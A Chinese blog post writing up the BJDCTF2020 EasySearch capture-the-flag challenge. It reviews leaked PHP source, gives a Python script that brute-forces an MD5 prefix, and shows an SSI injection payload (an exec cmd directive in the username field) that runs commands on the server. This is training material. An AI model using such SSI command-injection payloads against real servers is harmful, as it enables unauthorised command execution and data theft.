[BJDCTF2020]EasySearch——ssi

hcjtn

已于 2022-05-14 18:27:13 修改

阅读量458

点赞数 1

分类专栏： buuctf 文章标签： web web安全 ssi

于 2022-05-14 18:21:41 首次发布

本文链接：https://blog.csdn.net/m0_62879498/article/details/124770728

版权

buuctf 专栏收录该内容

29 篇文章 3 订阅

订阅专栏

本文探讨了如何通过源码分析发现EasySearch1中的MD5哈希验证漏洞，利用Python脚本生成符合特定条件的密文，进而构造payload利用SSI漏洞获取系统文件。重点介绍了构造username和利用MD5哈希的技巧以及ssi漏洞的工作原理。

摘要由CSDN通过智能技术生成

[BJDCTF2020]EasySearch 1

和上一关相似是源码泄露
使用御剑对目录进行扫描发现了 index.php.swp
在这里插入图片描述

0X01 源码分析

<?php
	ob_start();

function get_hash(){
	$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
	$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times 
 //mt_rand（min,max）  生成随机数
	$content = uniqid().$random;   
	//生成唯一ID
	return sha1($content); 
}

header("Content-Type: text/html;charset=utf-8"); 
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
    $admin = '6d0bc1';
    if ( $admin == substr(md5($_POST['password']),0,6)) { 
     //是请求参数password的MD5前六位等于6d0bc1，就得到解
        echo "<script>alert('[+] Welcome to manage system')</script>";
        $file_shtml = "public/".get_hash().".shtml";
        $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
        $text = '
        ***
        ***
        <h1>Hello,'.$_POST['username'].'</h1>
        ***
		***';
        fwrite($shtml,$text);
        fclose($shtml);
        ***
		echo "[!] Header  error ...";
    } else {
        echo "<script>alert('[!] Failed')</script>";
        
}else
{
***
}
***
?>

这一长串代码主要是对我闷输入的username进行MD5加密并且判断MD5加密后的前六位是否为6d0bc1
如果判断为 ture 就会执行后面的代码，对shtml进行一个读取，从而获取flag

我们在代码审计的时候，发现了 shtml,这里涉及到了 ssi

0X02 SSI

web服务器是无法读取动态语言，如果使用cgi协议来进行代码编写，就可以别服务器识别。
SSI 是放置在HTML页面中的指令。使用SSI可以是我们将动态生成的内容添加到现有的HTML页面，而不必通过cgi程序或其他动态技术来提供整个页面。
在这里可以将ssi简单的等价于cgi。

如果Apache开启SSI，并且SSI过滤不全，就会存在 SSI漏洞
ssi漏洞文章

0X03 构造username

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

用python脚本跑出MD5加密前六位是6d0bc1的密文

![在这里插入图片描述](https://img-blog.csdnimg.cn/d8a7a604a93b40b298e0d8e91e1

2020666
6d0bc1153791aa2b4e18b4f344f26ab4
2305004
6d0bc1ec71a9b814677b85e3ac9c3d40
9162671
6d0bc11ea877b37d694b38ba8a45b19c
51302775
6d0bc1a762d786e2f6ef20f705109f10
106531357
6d0bc1df6c5a457edcd96110a6f31606
129184799
6d0bc12c29dd6da1a9fefa3500d5c4ce
130150733
6d0bc1ae68929247c101271a618a615a
…

0X04 构造payload

username=<!--#exec cmd="ls ../"-->&password=9162671

在这里插入图片描述

username=&password=9162671

在这里插入图片描述

hcjtn

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[BJDCTF2020]EasySearch——ssi

[BJDCTF2020]EasySearch 1和上一关相似是源码泄露使用御剑对目录进行扫描发现了 index.php.swp0X01 源码分析<?php ob_start();function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars
复制链接

扫一扫

专栏目录